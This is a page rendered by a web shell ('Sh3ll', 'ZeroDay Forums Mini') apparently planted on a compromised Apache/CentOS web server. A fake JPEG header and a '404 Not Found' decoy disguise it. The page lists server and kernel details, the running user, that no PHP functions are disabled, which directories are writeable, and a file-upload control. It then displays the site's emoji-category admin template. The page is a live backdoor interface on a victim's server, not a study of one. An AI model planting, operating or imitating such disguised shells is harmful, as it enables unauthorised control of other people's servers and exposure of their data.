ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/netphim/code/admin/emoji_cat/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/netphim/code/admin/emoji_cat/list_tpl.php
<div class="card">
    <div class="card-header">
        Emoji category manager
        <div class="card-tools">
            <div class="d-flex">
                <div class="mr-auto">
                    <div class="form-group">
                        <a href="javascript:void(0);" onclick="open_popup('?act=admin&code=emoji_cat&type=post','Add emoji category')" class="btn btn-primary btn-sm"><i class="fa fa-plus"></i> Add emoji category
                        </a>

                    </div>
                </div>
                <div class="ml-2">
                    <div class="form-group">
                        <input id="demo-input-search2" type="text" placeholder="Enter a keyword and press Enter" autocomplete="off" class="module_title_search" value="<?php echo $keyword;?>">
                        <input type="hidden" value="act=admin&code=emoji_cat&type=list" id="txt_code_search">
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="card-body">
        <a href="javascript:void(0);" class="btn btn-primary btn-sm mb-2" id="update_pos"><i class="fa fa-bars"></i> Update position
        </a>
        <form action="" method="post" id="form_quick_update">
            <input type="hidden" name="type2" value="">
            <table class="table table-bordered color-table info-table">
                <thead>
                <tr>
                    <th>Position</th>
                    <th>Emoji category name</th>
                    <th>Emoji category image</th>
                    <th>#</th>
                </tr>
                </thead>
                <tbody>
                <?php echo $txt_list_emoji_cat;?>
                </tbody>
            </table>
        </form>
        <div class="text-right footable">
            <ul class="pagination" style="float: right;">
                <?php echo $nav;?>
            </ul>
        </div>
    </div>
</div>
<script>
    $('.delete_emoji_cat').click(function(){
        if(confirm('Are you sure?')) {
            var emoji_cat_id = $(this).data('id');
            $.ajax(
                {
                    url: '?act=admin&code=emoji_cat&type=delete&emoji_cat_id=' + emoji_cat_id,
                    success: function (result) {
                        if(result==emoji_cat_id) {
                            $('#tr_emoji_cat_' + emoji_cat_id).remove();
                        }
                    }
                }
            );
        }
    });
</script>

ZeroDay Forums Mini